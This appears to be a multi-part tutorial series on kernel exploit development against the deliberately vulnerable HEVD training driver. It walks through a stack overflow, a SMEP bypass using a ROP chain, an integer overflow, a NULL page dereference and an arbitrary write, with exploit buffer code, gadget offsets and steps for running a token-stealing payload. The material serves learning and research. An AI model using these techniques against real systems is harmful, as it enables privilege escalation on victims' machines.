05 8c813234 93f666be nt!memcpy+0x33
06 8c813a98 41414141 HEVD!TriggerStackOverflow+0x94 [c:\hacksysextremevulnerabledriver\driver\stackoverflow.c @ 92]
WARNING: Frame IP not in any known module. Following frames may be wrong.
07 8c813aa4 41414141 0x41414141
08 8c813aa8 41414141 0x41414141
09 8c813aac 41414141 0x41414141
0a 8c813ab0 41414141 0x41414141
0b 8c813ab4 41414141 0x41414141
If you continue execution, 0x41414141 will be popped into EIP. That wasn’t so complicated :)
3. Controlling execution flow
Exploitation is straightforward with the token-stealing payload described in part 2. The payload will be constructed in user-mode and its address passed as the return address. When the function exits, execution is redirected to the user-mode buffer. This is called a privilege escalation exploit as you’re executing code with higher privileges than you’re supposed to have.
Since SMEP is not enabled on Windows 7, we can jump to a payload in user-mode and get it executed with kernel privileges.
Now restart the VM (.reboot) and let’s put a breakpoint at the function’s start and end. To know where the function returns, use uf and calculate the offset.
We now know that the return address is stored 2076 bytes away from the start of the kernel buffer!
The big question is, where should you go after payload is executed?
4. Cleanup
Let’s re-think what we’re doing. Overwriting the return address of the first function on the stack means this function’s remaining instructions won’t be reached. In our case, this function is StackOverflowIoctlHandler at offset 0x1e.
Only two missing instructions need to be executed at the end of our payload:
9176b718 pop ebp
9176b719 ret 8
We’re still missing something. This function expects a return value in @eax, anything other than 0 will be treated as a failure, so let’s fix that before we execute the epilogue.
xor eax, eax ; Set NTSTATUS SUCCESS
The full exploit can be found here. Explanation of payload here.
5. Porting the exploit to Windows 7 64-bit
Porting this one is straightforward:
Offset to kernel buffer becomes 2056 instead of 2076.
A user-supplied buffer is being copied to a kernel buffer without a boundary check, resulting in a classic stack smashing vulnerability.
Function return address is controllable and can be pointed to a user-mode buffer as SMEP is not enabled.
Payload has to exist in an R?X memory segment, otherwise DEP will block the attempt.
No exceptions can be ignored, which means we have to patch the execution path after payload is executed. In our case that consisted of 1) setting the return value to 0 in @eax and 2) execute the remaining instructions in StackOverflowIoctlHandler before returning.
That’s it! Part 4 will be exploiting this on Windows 10 with SMEP bypass!
Part 3 showed how exploitation is done for the stack buffer overflow vulnerability on a Windows 7 x86/x64 machine. This part will target Windows 10 x64, which has SMEP enabled by default on it.
Windows build: 16299.15.amd64fre.rs3_release.170928-1534
ntoskrnl’s version: 10.0.16288.192
Instead of spoon-feeding you the problem, let’s run the x64 exploit on the Windows 10 machine and see what happens.
kd> bu HEVD!TriggerStackOverflow + 0xc8
kd> g
Breakpoint 1 hit
HEVD!TriggerStackOverflow+0xc8:
fffff801`7c4d5708 ret
kd> k
# Child-SP RetAddr Call Site
00 ffffa308`83dfe798 00007ff6`8eff11d0 HEVD!TriggerStackOverflow+0xc8 [c:\hacksysextremevulnerabledriver\driver\stackoverflow.c @ 101]
01 ffffa308`83dfe7a0 ffffd50f`91a47110 0x00007ff6`8eff11d0
02 ffffa308`83dfe7a8 00000000`00000000 0xffffd50f`91a47110
Examining the instructions at 00007ff68eff11d0 verifies that it’s our payload. What would go wrong?
kd> t
00007ff6`8eff11d0 xor rax,rax
kd> t
KDTARGET: Refreshing KD connection
*** Fatal System Error: 0x000000fc
(0x00007FF68EFF11D0,0x0000000037ADB025,0xFFFFA30883DFE610,0x0000000080000005)
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.
Stop error 0x000000fc indicates an ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY issue, which is caused here by a hardware mitigation called SMEP (Supervisor Mode Execution Prevention).
Continuing execution results in this lovely screen…
1. So what’s SMEP?
SMEP (Supervisor Mode Execution Prevention) is a hardware mitigation introduced by Intel (branded as “OS Guard”) that prevents code residing in user-mode pages from being executed with Ring-0 privileges; attempts result in a crash. This basically prevents EoP exploits that rely on executing a user-mode payload from ever executing it.
The SMEP bit is bit 20 of the CR4 register, which Intel defines as:
CR4 — Contains a group of flags that enable several architectural extensions, and indicate operating system or executive support for specific processor capabilities.
Setting this bit to 1 enables SMEP, while setting it to 0 disables it (duh).
There are a few ways described in the reading material that allow you to bypass SMEP, I recommend reading them for better understanding. For this exploit we’ll use the first method described in j00ru’s blog:
Construct a ROP chain that reads the content of CR4, flips the 20th bit and writes the new value to CR4. With SMEP disabled, we can “safely” jump to our user-mode payload.
If reading and/or modifying the content is not possible, just popping a “working” value to CR4 register will work. While this is not exactly elegant or clean, it does the job.
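The value that ends up in CR4 is just the old value with bit 20 cleared. Here is a minimal sketch of that arithmetic; the function names are chosen for this example and the sample CR4 value in the note below is hypothetical, so read the real one from your own target with WinDBG.

```c
#include <assert.h>
#include <stdint.h>

#define CR4_SMEP_BIT 20

/* Return 1 if the SMEP bit is set in the given CR4 value, 0 otherwise. */
int smep_enabled(uint64_t cr4)
{
    return (int)((cr4 >> CR4_SMEP_BIT) & 1u);
}

/* Return the CR4 value with only the SMEP bit cleared. */
uint64_t cr4_without_smep(uint64_t cr4)
{
    uint64_t result = cr4 & ~(1ull << CR4_SMEP_BIT);

    assert(!smep_enabled(result));
    return result;
}
```

For a CR4 value of 0x1506f8, cr4_without_smep returns 0x506f8; every other flag is left untouched, which matters because the remaining bits control features the system is actively using.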
Virtualization-based security (VBS)
Virtualization-based security (VBS) enhancements provide another layer of protection against attempts to execute malicious code in the kernel. For example, Device Guard blocks code execution in a non-signed area in kernel memory, including kernel EoP code. Enhancements in Device Guard also protect key MSRs, control registers, and descriptor table registers. Unauthorized modifications of the CR4 control register bitfields, including the SMEP field, are blocked instantly.
The gadgets we’ll be using all exist in ntoskrnl.exe. We can get its base address either with EnumDeviceDrivers (some say it’s not reliable, and given that its behaviour isn’t publicly documented you’d better cross your fingers, but I didn’t run into issues) or by calling NtQuerySystemInformation (you’ll need to export it first). We’ll be using the first approach.
LPVOID addresses[1000];
DWORD needed;

EnumDeviceDrivers(addresses, 1000, &needed);

printf("[+] Address of ntoskrnl.exe: 0x%p\n", addresses[0]);
Okay, now that we have nt’s base address, we can rely on finding relative offsets to it for calculating the ROP chain’s gadgets.
I referred to ptsecurity’s post on finding the gadgets.
The first gadget we need should let us write a value into the cr4 register. Once we find one, we’ll know which register we need to control next.
kd> uf nt!KiConfigureDynamicProcessor
nt!KiConfigureDynamicProcessor:
fffff802`2cc36ba8 sub rsp,28h
fffff802`2cc36bac call nt!KiEnableXSave (fffff802`2cc2df48)
fffff802`2cc36bb1 add rsp,28h
fffff802`2cc36bb5 ret
kd> uf fffff802`2cc2df48
nt!KiEnableXSave:
fffff802`2cc2df48 mov rcx,cr4
fffff802`2cc2df4b test qword ptr [nt!KeFeatureBits (fffff802`2cc0b118)],800000h
... snip ...
nt!KiEnableXSave+0x39b0:
fffff802`2cc318f8 btr rcx,12h
fffff802`2cc318fd mov cr4,rcx // First gadget!
fffff802`2cc31900 ret
kd> ? fffff802`2cc318fd - nt
Evaluate expression: 4341861 = 00000000`00424065
Gadget #1 is mov cr4,rcx at nt + 0x424065!
Now we need a way to control rcx’s content, ptsecurity’s post mentions HvlEndSystemInterrupt as a good target:
+------------------+
|pop rcx; ret | // nt + 0x424065
+------------------+
|value of rcx | // ? @cr4 & FFFFFFFF`FFEFFFFF
+------------------+
|mov cr4, rcx; ret | // nt + 0x424065
+------------------+
|addr of payload | // Available from user-mode
+------------------+
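As a rough sketch, the four stack slots in the diagram can be laid out as an array of 64-bit values. The function name and parameters are mine; both gadget offsets are passed in rather than hardcoded, because they change between kernel builds.

```c
#include <stdint.h>

#define ROP_CHAIN_LEN 4

/* Fills chain[0..3] with the four stack slots from the diagram.
 * pop_rcx_offset and mov_cr4_offset are offsets from nt's base address
 * and must be looked up for the kernel build being targeted. */
void build_smep_rop_chain(uint64_t chain[ROP_CHAIN_LEN],
                          uint64_t nt_base,
                          uint64_t pop_rcx_offset,
                          uint64_t mov_cr4_offset,
                          uint64_t current_cr4,
                          uint64_t payload_address)
{
    chain[0] = nt_base + pop_rcx_offset;             /* pop rcx; ret       */
    chain[1] = current_cr4 & 0xFFFFFFFFFFEFFFFFULL;  /* CR4, bit 20 clear  */
    chain[2] = nt_base + mov_cr4_offset;             /* mov cr4, rcx; ret  */
    chain[3] = payload_address;                      /* user-mode payload  */
}
```

The chain is then copied into the overflowing buffer starting at the offset of the saved return address.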
It’s extremely important to notice that writing more than 8 bytes starting at the RIP offset means the next stack frame gets corrupted. Returning to
3. Restoring execution flow
Let’s take one more look at the call stack BEFORE the memset call:
Pitfall 1: returning to StackOverflowIoctlHandler+0x1a
Although adjusting the stack to return to this call works, a parameter on the stack (Irp’s address) gets overwritten thanks to the ROP chain and is not recoverable as far as I know. This results in an access violation later on.
Assembly at TriggerStackOverflow+0xbc:
fffff801`710256f4 lea r11,[rsp+820h]
fffff801`710256fc mov rbx,qword ptr [r11+10h] // RBX should contain Irp's address, this is now overwritten to the new cr4 value
As a result, rbx (which previously held Irp’s address for the IrpDeviceIoCtlHandler call) now holds the new cr4 value, and accessing it later on results in a BSOD.
fffff801`f88d63e0 and qword ptr [rbx+38h],0 ds:002b:00000000`000706b0=????????????????
Notice that rbx holds cr4’s new value. This instruction maps to
You can make rbx point to some writable location but good luck having a valid Irp struct that passes the following call.
// Complete the request
IoCompleteRequest(Irp,IO_NO_INCREMENT);
Another dead end.
Pitfall 3: More access violations
Now we go one more level up the stack, to nt!IofCallDriver+0x59. Jumping to this code DOES work but still, access violation in nt occurs.
It’s extremely important (and I mean it) to take note of how all the registers behave when you send the IOCTL in both a normal (non-exploiting) call and an exploiting one.
In our case, rdi and rsi registers are the offending ones. Unluckily for us, in x64, parameters are passed in registers and those two registers get populated in HEVD!TriggerStackOverflow.
fffff800`185756f4 lea r11,[rsp+820h]
fffff800`185756fc mov rbx,qword ptr [r11+10h]
fffff800`18575700 mov rsi,qword ptr [r11+18h] // Points to our first gadget
fffff800`18575704 mov rsp,r11
fffff800`18575707 pop rdi // Points to our corrupted buffer ("AAAAAAAA")
fffff800`18575708 ret
Now those two registers are both set to zero if you submit an input buffer that doesn’t result in a RET overwrite (you can check this by sending a small buffer and checking the registers contents before you return from TriggerStackOverflow). This is no longer the case when you mess up the stack.
Now sometime after hitting nt!IofCallDriver+0x59
kd> u @rip
nt!ObfDereferenceObject+0x5:
fffff800`152381c5 mov qword ptr [rsp+10h],rsi
fffff800`152381ca push rdi
fffff800`152381cb sub rsp,30h
fffff800`152381cf cmp dword ptr [nt!ObpTraceFlags (fffff800`15604004)],0
fffff800`152381d6 mov rsi,rcx
fffff800`152381d9 jne nt!ObfDereferenceObject+0x160d16 (fffff800`15398ed6)
fffff800`152381df or rbx,0FFFFFFFFFFFFFFFFh
fffff800`152381e3 lock xadd qword ptr [rsi-30h],rbx
kd> ? @rsi
Evaluate expression: -8795734228891 = fffff800`1562c065 // Address of mov cr4,rcx instead of 0
kd> ? @rdi
Evaluate expression: 4702111234474983745 = 41414141`41414141 // Some offset from our buffer instead of 0
Now that we know those registers are corrupted, we can reset them to their expected value (zeroing them out) sometime before this code is hit. A perfect place for this is right after we execute our token stealing payload.
xor rsi, rsi
xor rdi, rdi
Last step would be adjusting the stack properly to point to nt!IofCallDriver+0x59’s stack frame by adding 0x40 to rsp.
This part shows how to exploit a vanilla integer overflow vulnerability. The post builds on a lot of content from parts 3 & 4, so this is a pretty short one.
    NTSTATUS TriggerIntegerOverflow(IN PVOID UserBuffer, IN SIZE_T Size) {
        ULONG Count = 0;
        NTSTATUS Status = STATUS_SUCCESS;
        ULONG BufferTerminator = 0xBAD0B0B0;
        ULONG KernelBuffer[BUFFER_SIZE] = {0};
        SIZE_T TerminatorSize = sizeof(BufferTerminator);

        PAGED_CODE();

        __try {
            // Verify if the buffer resides in user mode
            ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(KernelBuffer));

            DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
            DbgPrint("[+] UserBuffer Size: 0x%X\n", Size);
            DbgPrint("[+] KernelBuffer: 0x%p\n", &KernelBuffer);
            DbgPrint("[+] KernelBuffer Size: 0x%X\n", sizeof(KernelBuffer));

    #ifdef SECURE
            // Secure Note: This is secure because the developer is not doing any arithmetic
            // on the user supplied value. Instead, the developer is subtracting the size of
            // ULONG i.e. 4 on x86 from the size of KernelBuffer. Hence, integer overflow will
            // not occur and this check will not fail
            if (Size > (sizeof(KernelBuffer) - TerminatorSize)) {
                DbgPrint("[-] Invalid UserBuffer Size: 0x%X\n", Size);

                Status = STATUS_INVALID_BUFFER_SIZE;
                return Status;
            }
    #else
            DbgPrint("[+] Triggering Integer Overflow\n");

            // Vulnerability Note: This is a vanilla Integer Overflow vulnerability because if
            // 'Size' is 0xFFFFFFFF and we do an addition with size of ULONG i.e. 4 on x86, the
            // integer will wrap down and will finally cause this check to fail
            if ((Size + TerminatorSize) > sizeof(KernelBuffer)) {
                DbgPrint("[-] Invalid UserBuffer Size: 0x%X\n", Size);

                Status = STATUS_INVALID_BUFFER_SIZE;
                return Status;
            }
    #endif

            // Perform the copy operation
            while (Count < (Size / sizeof(ULONG))) {
                if (*(PULONG)UserBuffer != BufferTerminator) {
                    KernelBuffer[Count] = *(PULONG)UserBuffer;
                    UserBuffer = (PULONG)UserBuffer + 1;
                    Count++;
                }
                else {
                    break;
                }
            }
        }
        __except (EXCEPTION_EXECUTE_HANDLER) {
            Status = GetExceptionCode();
            DbgPrint("[-] Exception Code: 0x%X\n", Status);
        }

        return Status;
    }
Like the comment says, this is a vanilla integer overflow vuln caused by the programmer not considering a very large buffer size being passed to the driver. Any size from 0xfffffffc to 0xffffffff will cause this check to be bypassed. Notice that the copy operation terminates if the terminator value is encountered (it has to be 4-byte aligned though), so the buffer we submit doesn’t need to be as long as the size we pass.
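To see the wrap-around in isolation, here is a small user-mode sketch of both checks using 32-bit arithmetic, as on x86. The function names are mine, and the 2048-byte kernel buffer size is an assumption (BUFFER_SIZE is not shown in the listing).

```c
#include <stdint.h>

#define KERNEL_BUFFER_BYTES 2048u  /* assumption: BUFFER_SIZE of 512 ULONGs */
#define TERMINATOR_BYTES    4u

/* Vulnerable form: the 32-bit addition wraps before the comparison. */
int vulnerable_check_passes(uint32_t size)
{
    uint32_t total = size + TERMINATOR_BYTES;  /* wraps modulo 2^32 */
    return !(total > KERNEL_BUFFER_BYTES);
}

/* Secure form: arithmetic is done only on trusted constants. */
int secure_check_passes(uint32_t size)
{
    return !(size > (KERNEL_BUFFER_BYTES - TERMINATOR_BYTES));
}
```

With size set to 0xffffffff the sum wraps to 3, so the vulnerable check lets it through while the secure one rejects it. 0xfffffffb is the first value that no longer wraps.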
Exploitability on 64-bit
The InBufferSize parameter passed to DeviceIoControl is a DWORD, meaning it’s always of size 4 bytes. In the 64-bit driver, the following code does the comparison:
Comparison is done with 64-bit registers (no prefix/suffix was used to cast them to their 32-bit representation). This way, r11 will never overflow as it’ll be just set to 0x100000003, meaning that this vulnerability is not exploitable on 64-bit machines.
Update: I didn’t realize it at first, but the reason those values are handled correctly on x64 is that all of them are of type size_t, which is 64 bits wide there.
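The same check with 64-bit arithmetic can be sketched like this (the function name is mine, and the buffer size is passed in as a parameter since it is not shown in the listing). The DWORD length is zero-extended first, so the addition has plenty of headroom.

```c
#include <stdint.h>

/* The driver's check redone with 64-bit operands, as on x64. */
int check_passes_64(uint32_t in_buffer_size, uint64_t kernel_buffer_bytes)
{
    uint64_t size  = in_buffer_size;  /* DWORD zero-extended to 64 bits */
    uint64_t total = size + 4;        /* at most 0x100000003, no wrap   */
    return !(total > kernel_buffer_bytes);
}
```

Even the largest possible DWORD gives 0x100000003, which is far larger than any sane kernel buffer size, so the request is rejected.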
2. Controlling execution flow
First, we need to figure out the offset for EIP. Sending a small buffer and calculating the offset between the kernel buffer address and the return address will do:
Notice that you need to have the terminator value 4-bytes aligned as otherwise it will use the submitted Size parameter which will ultimately result in reading beyond the buffer and possibly causing an access violation.
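Why the alignment matters is easier to see with a user-mode model of the driver's copy loop. This is only a sketch: the function name is mine, and the two bounds checks exist purely to keep the model memory safe (the real loop has no such guards, which is the whole point).

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUFFER_TERMINATOR 0xBAD0B0B0u

/* Copies DWORDs from src until the terminator is read at a DWORD boundary
 * or claimed_size bytes are consumed. Returns the number of DWORDs copied. */
size_t copy_until_terminator(uint32_t *dst, size_t dst_dwords,
                             const unsigned char *src, size_t src_bytes,
                             uint32_t claimed_size)
{
    size_t count = 0;

    while (count < claimed_size / sizeof(uint32_t)) {
        uint32_t value;

        /* Sketch-only guards: stop where the real loop would run off a buffer. */
        if (count >= dst_dwords || (count + 1) * sizeof(uint32_t) > src_bytes)
            break;

        memcpy(&value, src + count * sizeof(uint32_t), sizeof value);
        if (value == BUFFER_TERMINATOR)
            break;

        dst[count++] = value;
    }
    return count;
}
```

With the terminator at byte offset 8 the loop stops after two DWORDs. With the same terminator at offset 6 it is never seen as a whole DWORD, and the loop keeps going until something else stops it.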
Now we know that RET is at offset 2088. The terminator value should be at 2088 + 4.
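    // SIZE and terminator are defined elsewhere in the exploit. From the way they are
    // used here, SIZE must be 2088 + 4 + 4 and terminator must point at the 4 bytes
    // of the driver's terminator value (0xBAD0B0B0).
    char* uBuffer = (char*)VirtualAlloc(
        NULL,
        2088 + 4 + 4,    // EIP offset + 4 bytes for EIP + 4 bytes for terminator
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    // Constructing buffer
    RtlFillMemory(uBuffer, SIZE, 'A');

    // Overwriting EIP
    DWORD* payload_address = (DWORD*)(uBuffer + SIZE - 8);
    *payload_address = (DWORD)&StealToken;

    // Copying terminator value
    RtlCopyMemory(uBuffer + SIZE - 4, terminator, 4);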
That’s pretty much it! At the end of the payload (StealToken) you need to make up for the missing stack frame by calling the remaining instructions (explained in detail in part 3).
Handle all code paths that deal with arithmetic with extreme care (especially when the values are user-supplied). Check operands and results for overflow/underflow conditions.
Use an integer type that will be able to hold all possible outputs of the addition, although this might not be always possible.
Vulnerability was not exploitable on 64-bit systems due to the way the comparison takes place between two 64-bit registers and the maximum value passed to DeviceIoControl will never overflow.
Submitted buffer had to contain a 4-byte terminator value. This is the simplest form of crafting a payload that needs to meet certain criteria.
Although our buffer wasn’t of extreme size, “lying” about its length to the driver was possible.
Heaps are dynamically allocated memory regions, unlike the stack which is statically allocated and is of a defined size.
Heaps allocated for kernel-mode components are called pools and are divided into two main types:
Non-paged pool: This memory is guaranteed to reside in RAM at all times, and is mostly used to store data that may get accessed during a hardware interrupt (at that point, the system can’t handle page faults).
Paged pool: This memory can be paged in and out of the paging file, which normally lives in the root of the Windows installation drive (Ex: C:\pagefile.sys).
Both kinds of memory can be allocated through the driver routine ExAllocatePoolWithTag by specifying the poolType and a 4-byte “tag”.
    NTSTATUS TriggerNullPointerDereference(IN PVOID UserBuffer) {
        ULONG UserValue = 0;
        ULONG MagicValue = 0xBAD0B0B0;
        NTSTATUS Status = STATUS_SUCCESS;
        PNULL_POINTER_DEREFERENCE NullPointerDereference = NULL;

        PAGED_CODE();

        __try {
            // Verify if the buffer resides in user mode
            ProbeForRead(UserBuffer, sizeof(NULL_POINTER_DEREFERENCE), (ULONG)__alignof(NULL_POINTER_DEREFERENCE));

            // Allocate Pool chunk
            NullPointerDereference = (PNULL_POINTER_DEREFERENCE)ExAllocatePoolWithTag(NonPagedPool, sizeof(NULL_POINTER_DEREFERENCE), (ULONG)POOL_TAG);

            if (!NullPointerDereference) {
                // Unable to allocate Pool chunk
                DbgPrint("[-] Unable to allocate Pool chunk\n");

                Status = STATUS_NO_MEMORY;
                return Status;
            }
            else {
                DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
                DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool));
                DbgPrint("[+] Pool Size: 0x%X\n", sizeof(NULL_POINTER_DEREFERENCE));
                DbgPrint("[+] Pool Chunk: 0x%p\n", NullPointerDereference);
            }

            // Get the value from user mode
            UserValue = *(PULONG)UserBuffer;

            DbgPrint("[+] UserValue: 0x%p\n", UserValue);
            DbgPrint("[+] NullPointerDereference: 0x%p\n", NullPointerDereference);

            // Validate the magic value
            if (UserValue == MagicValue) {
                NullPointerDereference->Value = UserValue;
                NullPointerDereference->Callback = &NullPointerDereferenceObjectCallback;

                DbgPrint("[+] NullPointerDereference->Value: 0x%p\n", NullPointerDereference->Value);
                DbgPrint("[+] NullPointerDereference->Callback: 0x%p\n", NullPointerDereference->Callback);
            }
            else {
                DbgPrint("[+] Freeing NullPointerDereference Object\n");
                DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
                DbgPrint("[+] Pool Chunk: 0x%p\n", NullPointerDereference);

                // Free the allocated Pool chunk
                ExFreePoolWithTag((PVOID)NullPointerDereference, (ULONG)POOL_TAG);

                // Set to NULL to avoid dangling pointer
                NullPointerDereference = NULL;
            }

    #ifdef SECURE
            // Secure Note: This is secure because the developer is checking if
            // 'NullPointerDereference' is not NULL before calling the callback function
            if (NullPointerDereference) {
                NullPointerDereference->Callback();
            }
    #else
            DbgPrint("[+] Triggering Null Pointer Dereference\n");

            // Vulnerability Note: This is a vanilla Null Pointer Dereference vulnerability
            // because the developer is not validating if 'NullPointerDereference' is NULL
            // before calling the callback function
            NullPointerDereference->Callback();
    #endif
        }
        __except (EXCEPTION_EXECUTE_HANDLER) {
            Status = GetExceptionCode();
            DbgPrint("[-] Exception Code: 0x%X\n", Status);
        }

        return Status;
    }
Non-paged pool memory of size sizeof(NULL_POINTER_DEREFERENCE) is allocated with the 4-byte tag kcaH. The NULL_POINTER_DEREFERENCE struct contains two fields, Value and Callback.
The size of this struct is 8 bytes on x86 and contains a function pointer. If the user-supplied buffer contains MagicValue, the function pointer NullPointerDereference->Callback will point to NullPointerDereferenceObjectCallback. But what happens if we don’t submit that value?
In that case, the pool memory gets freed and NullPointerDereference is set to NULL to avoid a dangling pointer. But this is only as good as the validation that follows: every time you use that pointer you need to check whether it’s NULL. Just setting it to NULL without performing proper validation could be disastrous, like in this example. In our case, Callback is called without checking that the pointer refers to a valid struct, so the driver ends up reading from the NULL page (first 64K bytes), which resides in usermode.
In this case, NullPointerDereference is just a struct at 0x00000000 and NullPointerDereference->Callback() calls whatever is at address 0x00000004. How are we going to exploit this?
The exploit will do the following:
Allocate the NULL page.
Put the address of the payload at 0x4.
Trigger the NULL page dereferencing through the driver IOCTL.
Brief history on mitigation effort for NULL page dereference vulnerabilities
Before we continue, let’s discuss the efforts done in Windows to prevent attacks on NULL pointer dereference vulnerabilities.
EMET (Enhanced Mitigation Experience Toolkit), a security tool packed with exploit mitigations, offered protection against NULL page dereference attacks by simply allocating the NULL page and marking it as “NOACCESS”. EMET is now deprecated and some parts of it are integrated into Windows 10 under the name Exploit Protection.
Starting with Windows 8, allocating the first 64K bytes is prohibited. The only exception is when NTVDM is enabled, but it is disabled by default.
Bottom line: vulnerability is not exploitable on our Windows 10 VM. If you really want to exploit it, enable NTVDM, then you’ll have to bypass SMEP (part 4 discussed this).
Before we talk with the driver, we need to allocate our NULL page and put the address of the payload at 0x4. Allocating the NULL page through VirtualAllocEx is not possible; instead, we can resolve the address of NtAllocateVirtualMemory in ntdll.dll and pass a small non-zero base address which gets rounded down to NULL.
To resolve the address of the function, we’ll use GetModuleHandle to get the address of ntdll.dll, then GetProcAddress to get the procedure address.
    typedef NTSTATUS(WINAPI *ptrNtAllocateVirtualMemory)(
        HANDLE ProcessHandle,
        PVOID *BaseAddress,
        ULONG ZeroBits,
        PULONG AllocationSize,
        ULONG AllocationType,
        ULONG Protect);

    ptrNtAllocateVirtualMemory NtAllocateVirtualMemory = (ptrNtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
    if (NtAllocateVirtualMemory == NULL) {
        printf("[-] Failed to export NtAllocateVirtualMemory.");
        exit(-1);
    }
Next we need to allocate the NULL page:
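    // Copied and modified from http://www.rohitab.com/discuss/topic/34884-c-small-hax-to-avoid-crashing-ur-prog/
    LPVOID baseAddress = (LPVOID)0x1;
    ULONG allocSize = 0x1000;

    // NtAllocateVirtualMemory returns an NTSTATUS; the allocated base address
    // is written back through baseAddress
    NTSTATUS status = NtAllocateVirtualMemory(
        GetCurrentProcess(),
        &baseAddress,    // Putting a small non-zero value gets rounded down to page granularity, pointing to the NULL page
        0,
        &allocSize,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
    if (status < 0) {
        printf("[-] Failed to allocate the NULL page.\n");
        exit(-1);
    }
    char* uBuffer = (char*)baseAddress;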
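The rounding itself is plain mask arithmetic. A minimal sketch (the function name is mine; this models the calculation only and makes no system call):

```c
#include <stdint.h>

/* Rounds address down to a multiple of granularity.
 * granularity must be a power of two, e.g. 0x1000 for a 4K page. */
uintptr_t round_down(uintptr_t address, uintptr_t granularity)
{
    return address & ~(granularity - 1);
}
```

round_down(0x1, 0x1000) is 0, which is why asking for base address 0x1 ends up handing us the NULL page.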
To verify if that’s working, put a DebugBreak and check the memory content after writing some dummy value.
A nice way to verify the NULL page is allocated, is by calling VirtualProtect which queries/sets the protection flags on memory segments. VirtualProtect returning false means the NULL page was not allocated.
3. Controlling execution flow
Now we want to put our payload address at 0x00000004:
*(INT_PTR*)(uBuffer+4)=(INT_PTR)&StealToken;
Now create a dummy buffer to send to the driver and put a breakpoint at HEVD!TriggerNullPointerDereference + 0x114.
Finally, after executing the token stealing payload, a ret with no stack adjusting will do.
4. Porting to Windows 7 x64
To port the exploit, you only need to adjust the offset at which you write the payload address as the struct size becomes 16 bytes. Also don’t forget to swap out the payload.
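Where the new offset comes from can be checked with offsetof. The struct below is my stand-in for the driver's definition, assuming a 32-bit value followed by a function pointer (which matches how Value and Callback are used in the driver code).

```c
#include <stddef.h>
#include <stdint.h>

typedef void (*callback_fn)(void);

/* Stand-in for NULL_POINTER_DEREFERENCE: ULONG Value, then Callback. */
struct null_pointer_dereference {
    uint32_t    value;
    callback_fn callback;
};

/* Offset from address 0 at which the payload address has to be written. */
size_t callback_offset(void)
{
    return offsetof(struct null_pointer_dereference, callback);
}
```

Built for x86 this gives 4 (struct size 8). Built for x64 the pointer is 8 bytes and must be 8-byte aligned, so 4 bytes of padding follow value, the offset becomes 8 and the struct grows to 16 bytes.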
    NTSTATUS TriggerArbitraryOverwrite(IN PWRITE_WHAT_WHERE UserWriteWhatWhere) {
        PULONG_PTR What = NULL;
        PULONG_PTR Where = NULL;
        NTSTATUS Status = STATUS_SUCCESS;

        PAGED_CODE();

        __try {
            // Verify if the buffer resides in user mode
            ProbeForRead((PVOID)UserWriteWhatWhere, sizeof(WRITE_WHAT_WHERE), (ULONG)__alignof(WRITE_WHAT_WHERE));

            What = UserWriteWhatWhere->What;
            Where = UserWriteWhatWhere->Where;

            DbgPrint("[+] UserWriteWhatWhere: 0x%p\n", UserWriteWhatWhere);
            DbgPrint("[+] WRITE_WHAT_WHERE Size: 0x%X\n", sizeof(WRITE_WHAT_WHERE));
            DbgPrint("[+] UserWriteWhatWhere->What: 0x%p\n", What);
            DbgPrint("[+] UserWriteWhatWhere->Where: 0x%p\n", Where);

    #ifdef SECURE
            // Secure Note: This is secure because the developer is properly validating if address
            // pointed by 'Where' and 'What' value resides in User mode by calling ProbeForRead()
            // routine before performing the write operation
            ProbeForRead((PVOID)Where, sizeof(PULONG_PTR), (ULONG)__alignof(PULONG_PTR));
            ProbeForRead((PVOID)What, sizeof(PULONG_PTR), (ULONG)__alignof(PULONG_PTR));

            *(Where) = *(What);
    #else
            DbgPrint("[+] Triggering Arbitrary Overwrite\n");

            // Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
            // because the developer is writing the value pointed by 'What' to memory location
            // pointed by 'Where' without properly validating if the values pointed by 'Where'
            // and 'What' resides in User mode
            *(Where) = *(What);
    #endif
        }
        __except (EXCEPTION_EXECUTE_HANDLER) {
            Status = GetExceptionCode();
            DbgPrint("[-] Exception Code: 0x%X\n", Status);
        }

        return Status;
    }
The vulnerability is obvious: TriggerArbitraryOverwrite allows writing a controlled value to a controlled address. This is very powerful, but can you come up with a way to exploit it without having another vulnerability?
Let’s consider some scenarios (that won’t work but are worth thinking about):
Overwrite a return address:
Needs an infoleak to reveal the stack layout or a read primitive.
Overwriting the process token with a SYSTEM one:
Need to know the EPROCESS address of the SYSTEM process.
Overwrite a function pointer called with kernel privileges:
Now that’s a good one. Excellent documentation of a reliable (11-year-old!) technique is Exploiting Common Flaws in Drivers.
hal.dll, HalDispatchTable and function pointers
hal.dll stands for Hardware Abstraction Layer, basically an interface for interacting with hardware without worrying about hardware-specific details. This allows Windows to be portable.
HalDispatchTable is a table containing function pointers to HAL routines. Let’s examine it a bit with WinDBG.
First entry at HalDispatchTable doesn’t seem to be populated but HalDispatchTable+4 points to HaliQuerySystemInformation and HalDispatchTable+8 points to HalpSetSystemInformation.
These locations are writable and we can calculate their exact location easily (more on that later). HaliQuerySystemInformation is the lesser used one of the two, so we can put the address of our shellcode at HalDispatchTable+4 and make a user-mode call that will end up calling this function.
HaliQuerySystemInformation is called by the undocumented NtQueryIntervalProfile (which according to the linked article is a “very low demanded API”), let’s take a look with WinDBG:
Function at [nt!HalDispatchTable+0x4] gets called at nt!KeQueryIntervalProfile+0x23 which we can trigger from user-mode. Hopefully, we won’t run into any trouble overwriting that entry.
The exploit will do the following:
Get HalDispatchTable location in the kernel.
Overwrite HalDispatchTable+4 with the address of our payload.
Calculate the address of NtQueryIntervalProfile and call it.
2. Getting the address of HalDispatchTable
HalDispatchTable exists in the kernel executive (ntoskrnl or another instance depending on the OS/processor). To get its address we need to:
Get the kernel’s base address in kernel space using NtQuerySystemInformation.
Load the kernel image in usermode and get the offset to HalDispatchTable.
Add the offset to kernel’s base address.
